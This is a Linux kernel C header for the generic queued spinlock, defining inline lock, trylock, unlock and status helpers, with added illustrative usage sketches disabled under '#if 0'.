/*
 * Queued spinlock
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * (C) Copyright 2013-2015 Hewlett-Packard Development Company, L.P.
 *
 * Authors: Waiman Long <waiman.long@hp.com>
 */
#ifndef __ASM_GENERIC_QSPINLOCK_H
#define __ASM_GENERIC_QSPINLOCK_H

#include <asm-generic/qspinlock_types.h>

/**
 * queued_spin_unlock_wait - wait until the _current_ lock holder releases the lock
 * @lock : Pointer to queued spinlock structure
 *
 * There is a very slight possibility of live-lock if the lockers keep coming
 * and the waiter is just unfortunate enough to not see any unlock state.
 */
#ifndef queued_spin_unlock_wait
extern void queued_spin_unlock_wait(struct qspinlock *lock);
#endif
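/*
 * Usage sketch (illustrative only, not part of this header): a
 * hypothetical teardown path could use queued_spin_unlock_wait() to
 * let the current holder drain without ever taking the lock itself.
 */
#if 0
static void example_drain_before_teardown(struct qspinlock *lock)
{
	/* Returns once the lock has been observed in an unlocked state. */
	queued_spin_unlock_wait(lock);
	/* ... proceed with teardown per the caller's own protocol ... */
}
#endif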

/**
 * queued_spin_is_locked - is the spinlock locked?
 * @lock: Pointer to queued spinlock structure
 * Return: 1 if it is locked, 0 otherwise
 */
#ifndef queued_spin_is_locked
static __always_inline int queued_spin_is_locked(struct qspinlock *lock)
{
	/*
	 * See queued_spin_unlock_wait().
	 *
	 * Any !0 state indicates it is locked, even if _Q_LOCKED_VAL
	 * isn't immediately observable.
	 */
	return atomic_read(&lock->val);
}
#endif
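/*
 * Usage sketch (illustrative only): queued_spin_is_locked() is mostly
 * useful for assertions, e.g. checking that a lock is held before
 * touching the data it protects.
 */
#if 0
static void example_assert_held(struct qspinlock *lock)
{
	/* Any non-zero ->val counts as locked, as documented above. */
	WARN_ON_ONCE(!queued_spin_is_locked(lock));
}
#endif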

/**
 * queued_spin_value_unlocked - is the spinlock structure unlocked?
 * @lock: queued spinlock structure
 * Return: 1 if it is unlocked, 0 otherwise
 *
 * N.B. Whenever there are tasks waiting for the lock, it is considered
 *      locked wrt the lockref code. This prevents the lockref code from
 *      stealing the lock and changing things underneath it, and allows
 *      some optimizations to be applied without conflicting with lockref.
 */
static __always_inline int queued_spin_value_unlocked(struct qspinlock lock)
{
	return !atomic_read(&lock.val);
}
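/*
 * Sketch of the by-value use described above (illustrative struct and
 * names, not lockref's actual code): lockref-style code snapshots the
 * lock together with its data and only proceeds locklessly when the
 * snapshot shows a fully unlocked, uncontended lock word.
 */
#if 0
struct example_lockref {
	struct qspinlock lock;
	int count;
};

static bool example_snapshot_is_usable(struct example_lockref *ref)
{
	struct example_lockref snap = *ref;	/* by-value snapshot */

	/* Waiters make ->val non-zero, so they also fail this test. */
	return queued_spin_value_unlocked(snap.lock);
}
#endif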

/**
 * queued_spin_is_contended - check if the lock is contended
 * @lock : Pointer to queued spinlock structure
 * Return: 1 if lock contended, 0 otherwise
 */
static __always_inline int queued_spin_is_contended(struct qspinlock *lock)
{
	return atomic_read(&lock->val) & ~_Q_LOCKED_MASK;
}

/**
 * queued_spin_trylock - try to acquire the queued spinlock
 * @lock : Pointer to queued spinlock structure
 * Return: 1 if lock acquired, 0 if failed
 */
static __always_inline int queued_spin_trylock(struct qspinlock *lock)
{
	if (!atomic_read(&lock->val) &&
	   (atomic_cmpxchg(&lock->val, 0, _Q_LOCKED_VAL) == 0))
		return 1;
	return 0;
}
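/*
 * Usage sketch (illustrative names): the usual trylock pattern, doing
 * other work instead of spinning when the lock is contended.
 */
#if 0
static bool example_try_fast_path(struct qspinlock *lock)
{
	if (!queued_spin_trylock(lock))
		return false;		/* contended: caller falls back */
	/* ... short critical section ... */
	queued_spin_unlock(lock);
	return true;
}
#endif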

extern void queued_spin_lock_slowpath(struct qspinlock *lock, u32 val);

/**
 * queued_spin_lock - acquire a queued spinlock
 * @lock: Pointer to queued spinlock structure
 */
static __always_inline void queued_spin_lock(struct qspinlock *lock)
{
	u32 val;

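	/*
	 * Fast path: transition 0 -> _Q_LOCKED_VAL with a single cmpxchg.
	 * Any other observed value means the lock is held or contended.
	 */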
	val = atomic_cmpxchg(&lock->val, 0, _Q_LOCKED_VAL);
	if (likely(val == 0))
		return;
	queued_spin_lock_slowpath(lock, val);
}

#ifndef queued_spin_unlock
/**
 * queued_spin_unlock - release a queued spinlock
 * @lock : Pointer to queued spinlock structure
 */
static __always_inline void queued_spin_unlock(struct qspinlock *lock)
{
	/*
	 * smp_mb__before_atomic() in order to guarantee release semantics
	 */
	smp_mb__before_atomic();
	atomic_sub(_Q_LOCKED_VAL, &lock->val);
}
#endif
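/*
 * Sketch of the basic lock/unlock pairing (illustrative names). The
 * barrier in queued_spin_unlock() gives the unlock release semantics:
 * updates made inside the critical section are visible to the next
 * holder before the lock word clears.
 */
#if 0
static int example_counter;

static void example_critical_section(struct qspinlock *lock)
{
	queued_spin_lock(lock);
	example_counter++;		/* protected update */
	queued_spin_unlock(lock);	/* publishes the update */
}
#endif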

#ifndef virt_spin_lock
static __always_inline bool virt_spin_lock(struct qspinlock *lock)
{
	return false;
}
#endif
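/*
 * Sketch of an architecture override (illustrative; loosely modelled on
 * what x86 does, not a drop-in implementation): a guest running under a
 * hypervisor can define virt_spin_lock to bypass the MCS queueing and
 * use a plain test-and-set loop, which degrades more gracefully when
 * vCPUs are preempted. The hypervisor check below is hypothetical.
 */
#if 0
#define virt_spin_lock virt_spin_lock
static __always_inline bool virt_spin_lock(struct qspinlock *lock)
{
	if (!example_running_under_hypervisor())	/* hypothetical check */
		return false;

	/* Simple test-and-set; no queueing while virtualized. */
	do {
		while (atomic_read(&lock->val))
			cpu_relax();
	} while (atomic_cmpxchg(&lock->val, 0, _Q_LOCKED_VAL) != 0);

	return true;
}
#endif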

/*
 * Remapping spinlock architecture specific functions to the corresponding
 * queued spinlock functions.
 */
#define arch_spin_is_locked(l)		queued_spin_is_locked(l)
#define arch_spin_is_contended(l)	queued_spin_is_contended(l)
#define arch_spin_value_unlocked(l)	queued_spin_value_unlocked(l)
#define arch_spin_lock(l)		queued_spin_lock(l)
#define arch_spin_trylock(l)		queued_spin_trylock(l)
#define arch_spin_unlock(l)		queued_spin_unlock(l)
#define arch_spin_lock_flags(l, f)	queued_spin_lock(l)
#define arch_spin_unlock_wait(l)	queued_spin_unlock_wait(l)
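
/*
 * Illustrative only: with the mappings above, core kernel code such as
 * spin_lock()/spin_unlock() ultimately expands to the queued_spin_*()
 * functions on any architecture that includes this header.
 */
#if 0
static void example_arch_usage(arch_spinlock_t *l)
{
	arch_spin_lock(l);	/* -> queued_spin_lock(l) */
	arch_spin_unlock(l);	/* -> queued_spin_unlock(l) */
}
#endif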

#endif /* __ASM_GENERIC_QSPINLOCK_H */
